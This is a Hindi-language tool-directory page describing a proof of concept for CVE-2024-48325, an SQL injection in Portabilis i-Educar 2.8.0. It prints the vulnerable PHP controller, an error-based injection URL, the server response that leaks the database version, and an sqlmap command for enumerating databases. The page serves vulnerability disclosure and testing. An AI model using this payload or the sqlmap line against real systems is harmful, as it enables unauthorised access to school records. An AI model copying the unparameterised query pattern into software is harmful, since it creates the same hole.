Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-48325 — Portabilis i-Educar 2.8.0 में SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो getDocuments एंडपॉइंट के माध्यम से अप्रमाणित डेटाबेस एक्सेस और SQLMap का उपयोग करके स्वचालित शोषण प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/osvaldotenorio/cve-2024-48325
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubosvaldotenorio/cve-2024-48325

cve-2024-48325

Portabilis i-Educar 2.8.0 में SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो getDocuments एंडपॉइंट के माध्यम से अप्रमाणित डेटाबेस एक्सेस और SQLMap का उपयोग करके स्वचालित शोषण प्रदर्शित करता है।

रिपॉजिटरी देखें
171 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-48325

विवरण: एक प्रमाणित उपयोगकर्ता InstituicaoDocumentacaoController वर्ग के getDocuments फ़ंक्शन में SQL इंजेक्शन भेद्यता का दुरुपयोग कर सकता है। /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id में instituicao_id पैरामीटर ठीक से स्वच्छ नहीं किया गया है, जिससे एक प्रमाणित दूरस्थ हमलावर को दुर्भावनापूर्ण SQL कमांड इंजेक्ट करने की अनुमति मिलती है।

संस्करण: Portabilis i-Educar 2.8.0 में खोजा गया।

प्रूफ ऑफ कॉन्सेप्ट

भेद्यता विवरण

समस्या InstituicaoDocumentacaoController वर्ग के getDocuments फ़ंक्शन में मौजूद है, जिसे निम्नलिखित एंडपॉइंट के माध्यम से ट्रिगर किया जा सकता है:

class InstituicaoDocumentacaoController extends ApiCoreController
{
    protected function insertDocuments()
    {
        $var1 = $this->getRequest()->instituicao_id;
        $var2 = $this->getRequest()->titulo_documento;
        $var3 = $this->getRequest()->url_documento;
        $var4 = $this->getRequest()->ref_usuario_cad;
        $var5 = $this->getRequest()->ref_cod_escola;
        $sql = "INSERT INTO pmieducar.instituicao_documentacao (instituicao_id, titulo_documento, url_documento, ref_usuario_cad, ref_cod_escola) VALUES ($var1, '$var2', '$var3', $var4, $var5)";
        $this->fetchPreparedQuery($sql);
        $sql = "SELECT MAX(id) FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1";
        $novoId = $this->fetchPreparedQuery($sql);
        return ['id' => $novoId[0][0]];
    }
    
    protected function getDocuments()
    {
        $var1 = $this->getRequest()->instituicao_id;
        $sql = "SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1 ORDER BY id DESC";
        $instituicao = $this->fetchPreparedQuery($sql);
        $attrs = ['id', 'titulo_documento', 'url_documento', 'ref_usuario_cad', 'ref_cod_escola'];
        $instituicao = Portabilis_Array_Utils::filterSet($instituicao, $attrs);
        return ['documentos' => $instituicao];
    }
}

भेद्यता कैसे होती है

instituicao_id पैरामीटर का उपयोग SQL क्वेरी में सीधे बिना उचित स्वच्छता या पैरामीटराइजेशन के किया जाता है। यह हमलावरों को SQL कमांड इंजेक्ट करने के लिए दुर्भावनापूर्ण HTTP अनुरोध भेजने की अनुमति देता है, जिससे डेटाबेस तक अनधिकृत पहुंच या डेटा में हेरफेर हो सकता है।

  • उदाहरण एंडपॉइंट जो भेद्यता को ट्रिगर करता है: /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14
  • उदाहरण एक्सप्लॉइट: /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14+AND+(CAST(VERSION()+AS+INTEGER))%3d1

सर्वर प्रतिक्रिया:

{
    "oper": "get",
    "resource": "getDocuments",
    "msgs": [
        {
            "msg": "Exception: Error preparing query (SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC) in the database: Exception: SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for type integer: \"PostgreSQL 16.4 on x86_64-pc-linux-musl, compiled by gcc (Alpine 13.2.1_git20240309) 13.2.1 20240309, 64-bit\" (Connection: pgsql, SQL: SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC)",
            "type": "error"
        }
    ],
    "any_error_msg": true
}

स्वचालित शोषण

  • इस भेद्यता का शोषण SQLMap जैसे स्वचालित उपकरणों द्वारा भी किया जा सकता है, जिससे डेटाबेस गणना संभव होती है: sqlmap -r ../instituicaoDocumentacao.r --dbms postgres --dbs -p instituicao_id --risk 3 --level 5

SQLMap

टूल डाउनलोड करें